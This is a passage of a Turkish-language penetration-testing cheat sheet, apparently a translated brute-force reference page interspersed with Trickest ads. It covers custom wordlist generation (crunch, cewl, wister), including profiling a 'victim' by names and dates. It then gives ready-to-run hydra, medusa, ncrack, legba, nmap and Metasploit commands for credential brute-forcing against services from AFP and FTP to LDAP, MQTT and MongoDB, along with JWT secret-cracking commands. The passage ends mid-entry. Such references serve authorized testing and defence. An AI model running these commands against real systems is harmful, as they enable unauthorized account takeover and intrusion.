Dünyanın en gelişmiş topluluk araçlarıyla desteklenen iş akışlarını kolayca oluşturmak ve otomatikleştirmek için Trickest kullanın.
Bugün Erişim Alın:
Varsayılan Kimlik Bilgileri
Kullanılan teknolojinin varsayılan kimlik bilgilerini google'da arayın veya bu bağlantıları deneyin :
Kendi Sözlüklerinizi Oluşturun
Hedef hakkında mümkün olduğunca fazla bilgi toplayın ve özel bir sözlük oluşturun. Yardımcı olabilecek araçlar:
Crunch
Copy crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%
Cewl
Copy cewl example.com -m 5 -w words.txt
Kurban hakkında bildiklerinize (isimler, tarihler...) dayalı şifreler oluşturun.
Belirli bir hedefle ilgili kullanılacak benzersiz ve ideal bir kelime listesi oluşturmanıza olanak tanıyan, bir kelime seti sağlamanızı sağlayan bir kelime listesi oluşturucu aracıdır.
Copy python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
__ _______ _____ _______ ______ _____
\ \ / /_ _ | / ____ | __ __ | ____ | __ \
\ \ / \ / / | | | ( ___ | | | | __ | | __ ) |
\ \/ \/ / | | \___ \ | | | __ | | _ /
\ / \ / _ | | _ ____ ) | | | | | ____ | | \ \
\/ \/ | _____ | _____/ | _ | | ______ | _ | \_\
Version 1.0.3 Cycurity
Generating wordlist...
[########################################] 100%
Generated 67885 lines.
Finished in 0.920s.
Kelime Listeleri
Trickest kullanarak dünyanın en gelişmiş topluluk araçlarıyla desteklenen iş akışlarını kolayca oluşturun ve otomatikleştirin .
Bugün Erişim Alın:
Hizmetler
Hizmet adıyla alfabetik sıraya göre sıralanmıştır.
AFP
Copy nmap -p 548 --script afp-brute < I P >
msf > use auxiliary/scanner/afp/afp_login
msf > set BLANK_PASSWORDS true
msf > set USER_AS_PASS true
msf > set PASS_FILE < PATH_PASSWD S >
msf > set USER_FILE < PATH_USER S >
msf > run
AJP
Copy nmap --script ajp-brute -p 8009 < I P >
AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM ve Solace)
Copy legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]
Cassandra
Copy nmap --script cassandra-brute -p 9160 < I P >
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042
CouchDB
Copy msf > use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
Docker Registry
Copy hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
Elasticsearch
Copy hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
FTP
Copy hydra -l root -P passwords.txt [-t 32] < I P > ftp
ncrack -p 21 --user root -P passwords.txt < I P > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < I P > -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
HTTP Genel Brute
HTTP Temel Kimlik Doğrulama
Copy hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h < I P > -u < usernam e > -P < passwords.tx t > -M http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
HTTP - NTLM
Copy legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
HTTP - Post Form
Copy hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https
For https you have to change from "http-post-form" to "https-post-form"
HTTP - CMS -- (W)ordpress, (J)oomla veya (D)rupal veya (M)oodle
Copy cmsmap -f W/J/D/M -u a -p a https://wordpress.com
# Check also https://github.com/evilsocket/legba/wiki/HTTP
IMAP
Copy hydra -l USERNAME -P /path/to/passwords.txt -f < I P > imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f < I P > imap -V
nmap -sV --script imap-brute -p < POR T > < I P >
legba imap --username user --password data/passwords.txt --target localhost:993
IRC
Copy nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p < POR T > < I P >
ISCSI
Copy nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 < I P >
JWT
Copy #hashcat
hashcat -m 16500 -a 0 jwt.txt . \w ordlists \r ockyou.txt
#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt < JWT toke n >
#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
LDAP
Copy nmap --script ldap-brute -p 389 < I P >
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match
MQTT
Copy ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt
Mongo
Copy nmap -sV --script mongodb-brute -n -p 27017 < I P >
use auxiliary/scanner/mongodb/mongodb_login
legba mongodb